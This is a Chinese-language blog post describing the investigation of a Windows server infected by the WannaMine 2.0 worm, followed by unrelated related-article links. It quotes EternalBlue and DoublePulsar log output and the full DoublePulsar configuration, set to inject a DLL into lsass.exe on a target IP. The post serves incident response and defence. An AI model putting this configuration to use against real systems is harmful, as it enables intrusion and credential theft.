近期用户反馈某台服务器总感觉性能不是很好存在卡顿,于是今天远程上去分析。

打开任务管理器发现CPU使用率非常低,内存使用也在接受范围内(10/64G)。不过我有一个偏好就是不喜欢用系统自带的任务管理器查看资源,顺手把procexp搞上去再看一遍。发现rundll32.exe显示占用了62%左右的CPU资源,加载执行一个名为HalPluginServices.dll。之前看过《深入解析Windows操作系统》,就对前缀Hal(Hardware Abstraction Layer)有个概念。和它并行在svhost.exe下运行的还有spoolsv.exe,第一眼看都是挺系统级的执行文件。移动鼠标到spoolsv.exe查看它的运行路径,显示:C:\Windows\SpeechsTracing\spoolsv.exe。看到Speech前缀我心想是不是微软的讲述人相关功能,碰巧打开目录下面还有一个Microsoft子目录,这时候差点信以为真。但我注意到spoolsv.exe会执行cmd,好奇查看了一下是什么命令:

C:\Windows\SpeechsTracing\Microsoft\svhost.exe > stage1.txt

出于好奇心紧接着打开stage1.txt,看到如下内容:

[*] Connecting to target for exploitation.

    [+] Connection established for exploitation.

[*] Pinging backdoor...

    [+] Backdoor not installed, game on.

[*] Target OS selected valid for OS indicated by SMB reply

[*] CORE raw buffer dump ( bytes):

0x00000000    6e  6f             Windows Server

0x00000010          6e          R2 Enterpris

0x00000020                   e  Service P

0x00000030    6b                                   ack .

[*] Building exploit buffer

[*] Sending all but last fragment of exploit packet

    ................DONE.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Starting non-paged pool grooming

    [+] Sending SMBv2 buffers

        ..........DONE.

    [+] Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.

[*] Sending SMB Echo request

[*] Good reply from SMB Echo request

[*] Sending last fragment of exploit packet!

    DONE.

[*] Receiving response from exploit packet

这不正是一个SMB攻击,再看一下同目录下的stage2.txt:

[+] Selected Protocol SMB

[.] Connecting to target...

[+] Connected to target, pinging backdoor...

    [+] Backdoor returned code:  - Success!

    [+] Ping returned Target architecture: x64 (-bit) - XOR Key: 0xEE83B3A2

    SMB Connection string is: Windows Server  R2 Enterprise  Service Pack

    Target OS is:  R2 x64

    Target SP is:

    [+] Backdoor installed

    [+] DLL built

    [.] Sending shellcode to inject DLL

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Backdoor returned code:  - Success!

    [+] Command completed successfully

<config xmlns="urn:trch" id="a748cf79831d6c2444050f18217611549fe3f619" configversion="1.3.1.0" name="Doublepulsar" version="1.3.1" schemaversion="2.0.0">

  <inputparameters>

    <parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds).  Use -1 for no timeout." type="S16" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="TargetIp" description="Target IP Address" type="IPv4" format="Scalar" valid="true">

      <value>10.244.251.57</value>

    </parameter>

    <parameter name="TargetPort" description="Port used by the Double Pulsar back door" type="TcpPort" format="Scalar" valid="true">

      <default></default>

      <value></value>

    </parameter>

    <parameter name="LogFile" description="Where to write log file" type="String" format="Scalar" required="false"></parameter>

    <parameter name="OutConfig" description="Where to write output parameters file" type="String" format="Scalar" valid="true">

      <default>stdout</default>

      <value>stdout</value>

    </parameter>

    <parameter name="ValidateOnly" description="Stop execution after parameter validation" type="Boolean" format="Scalar" valid="true">

      <default>false</default>

      <value>false</value>

    </parameter>

    <paramchoice name="Protocol" description="Protocol for the backdoor to speak">

      <default>SMB</default>

      <value>SMB</value>

      <paramgroup name="SMB" description="Ring 0 SMB (TCP 445) backdoor"></paramgroup>

      <paramgroup name="RDP" description="Ring 0 RDP (TCP 3389) backdoor"></paramgroup>

    </paramchoice>

    <paramchoice name="Architecture" description="Architecture of the target OS">

      <default>x64</default>

      <value>x64</value>

      <paramgroup name="x86" description="x86 32-bits"></paramgroup>

      <paramgroup name="x64" description="x64 64-bits"></paramgroup>

    </paramchoice>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <default>OutputInstall</default>

      <value>RunDLL</value>

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a binary file on disk.">

        <parameter name="OutputFile" description="Full path to the output file" type="String" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor"></paramgroup>

      <paramgroup name="RunDLL" description="Use an APC to inject a DLL into a user mode process.">

        <parameter name="DllPayload" description="DLL to inject into user mode" type="LocalFile" format="Scalar" valid="true">

          <value>C:\Windows\SpeechsTracing\Microsoft\\x64.dll</value>

        </parameter>

        <parameter name="DllOrdinal" description="The exported ordinal number of the DLL being injected to call" type="U32" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

        <parameter name="ProcessName" description="Name of process to inject into" type="String" format="Scalar" valid="true">

          <default>lsass.exe</default>

          <value>lsass.exe</value>

        </parameter>

        <parameter name="ProcessCommandLine" description="Command line of process to inject into" type="String" format="Scalar" valid="true">

          <default></default>

          <value></value>

        </parameter>

      </paramgroup>

      <paramgroup name="RunShellcode" description="Run raw shellcode">

        <parameter name="ShellcodeFile" description="Full path to the file containing shellcode" type="LocalFile" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing shellcode to run" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system"></paramgroup>

    </paramchoice>

  </inputparameters>

  <outputparameters>

    <paramchoice name="Function" description="Operation for backdoor to perform">

      <paramgroup name="OutputInstall" description="Only output the install shellcode to a file on disk.">

        <parameter name="ShellcodeFile" description="Full path to the file containing Double Pulsar shellcode installer" type="String" format="Scalar"></parameter>

        <parameter name="ShellcodeData" description="Full path to the file containing Double Pulsar shellcode installer" type="LocalFile" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Ping" description="Test for presence of backdoor">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="RunDLL" description="Inject a DLL into a user mode process.">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

      <paramgroup name="Uninstall" description="Remove's backdoor from system">

        <parameter name="Is64Bit" description="Is target 64 or 32 bit" type="U32" format="Scalar"></parameter>

      </paramgroup>

    </paramchoice>

  </outputparameters>

</config>

基本明白这是一个蠕虫病毒,目录下面还有之前的永恒之蓝(Eternalblue-2.2.0.fb)。这个时候我突然意识到一个现象,原来病毒作者发现用户运行任务管理器时候会自动把rundll32.exe给杀掉,造成一个系统运行占用CPU资源很少的假象,我只是运行了procexp才发现了问题。

服务器中了蠕虫病毒Wannamine2.0小记的更多相关文章

  1. Window应急响应(二):蠕虫病毒

    0x00 前言 ​ 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播,每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序. 常见的 ...

  2. 3.Windows应急响应:蠕虫病毒

    0x00 前言 蠕虫病毒是一种十分古老的计算机病毒,它是一种自包含的程序(或是一套程序),通常通过网络途径传播, 每入侵到一台新的计算机,它就在这台计算机上复制自己,并自动执行它自身的程序.常见的蠕虫 ...

  3. 30天轻松学习javaweb_Eclipse在修改了web.xml后将自动更新到tomcat服务器中

    context.xml中增加<WatchedResource>WEB-INF/web.xml</WatchedResource>,Eclipse在修改了web.xml后将自动更 ...

  4. 注册asp.net 4.0版本到IIS服务器中

    在IIS服务器的运维的过程中,有时候部署asp.net网站发现未安装.net framework对应版本信息,此时就需要重新将.net framework对应的版本注册到IIS中,此处以重新注册.ne ...

  5. [转帖]Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染

    Docker Hub上镜像发现挖矿蠕虫病毒,已导致2000台主机感染 https://www.kubernetes.org.cn/5951.html 本来想说可以用 official版本的镜像 但是一 ...

  6. 关于winlogo.exe中了“落雪”病毒的解决方法

    Windows Logon Process,Windows NT 用户登陆程序,管理用户登录和退出.该进程的正常路径应是 C:\Windows\System32 且是以 SYSTEM 用户运行,若不是 ...

  7. 云服务器ECS挖矿木马病毒处理和解决方案

    云服务器ECS挖矿木马病毒处理和解决方案 最近由于网络环境安全意识低的原因,导致一些云服务器ECS中了挖矿病毒的坑. 总结了一些解决挖矿病毒的一些思路.由于病毒更新速度快仅供参考. 1.查看cpu爆满 ...

  8. Ramnit蠕虫病毒分析和查杀

    Ramnit是一种蠕虫病毒.拥有多种传播方式,不仅可以通过网页进行传播,还可以通过感染计算机内可执行文件进行传播.该病毒在2010年第一次被安全研究者发现,从网络威胁监控中可以看出目前仍然有大量的主机 ...

  9. Trick蠕虫病毒来袭!幕后主使竟是一名高中生“黑客”!

    黑客一直是美国电影中的重要元素,很多经典大片中都有黑客的身影,如战争游戏.黑客帝国等.电影中黑客总是神通广大.行侠仗义,<战争游戏>中的年轻黑客大卫•莱特曼利用黑客技术避免引爆核武器,&l ...

随机推荐

  1. MUI右滑关闭窗口用Webview的drag实现

    mui.init({swipeBack:true}); 必须要用很快的速度摩擦屏幕才能达到右滑关闭窗口的效果,且在右边一般都会失效. mui这个滑动,是纯前端的,这个效率在Android上确实一般. ...

  2. linux 监控工具netdata

    1. 背景 工作的关系,需要使用netdata将服务器信息实时.动态展示. 调研了netdata工具,记录一下,方便后续使用. 2. netdata介绍 2.1 netdata 能做什么? 可以参考: ...

  3. 全景分割pipeline搭建

    全景分割pipeline搭建 整体方法使用语义分割和实例分割结果,融合标签得到全景分割结果: 数据集使用:panoptic_annotations_trainval2017和cityscapes; p ...

  4. OS面试题(转载)

    转载自:http://placement.freshersworld.com/power-preparation/technical-interview-preparation/os-intervie ...

  5. plsql连接oracle数据库,不用配置任何东西(转)

    在软件开发的过程中,对于使用oracle的朋友们来说,使用plsql工具操作oracle数据库是非常方便的,可是plsql连接oracle数据库的方式有很多种,今天就给大家介绍一种最简单的连接方式,只 ...

  6. 一篇文章让你学透Linux系统中的more命令

    Linux 下有很多实用工具可以让你在终端界面查看文本文件.其中一个就是 more. more 跟我之前另一篇文章里写到的工具 —— less 很相似.它们之间的主要不同点在于 more 只允许你向前 ...

  7. WPF获取当前用户控件的父级窗体

    方式一.通过当前控件名获取父级窗体 Window targetWindow = Window.GetWindow(button); 方式二.通过当前控件获取父级窗体 Window parentWind ...

  8. iOS 录制视频MOV格式转MP4

    使用UIImagePickerController系统控制器录制视频时,默认生成的格式是MOV,如果要转成MP4格式的,我们需要使用AVAssetExportSession; 支持转换的视频质量:低, ...

  9. 解决Nginx的13: Permission denied) while connecting to upstream

    一.问题 做Nginx负载的时候,经常遇到这样的情况: // :: [crit] #: * connect() to failed (: Permission denied) while connec ...

  10. hive列转行

    一.问题 hive如何将 a b a b a b c d c d c d 变为: a b ,, c d ,, 二.数据 test.txt cat column_row.txt a,b, a,b, a, ...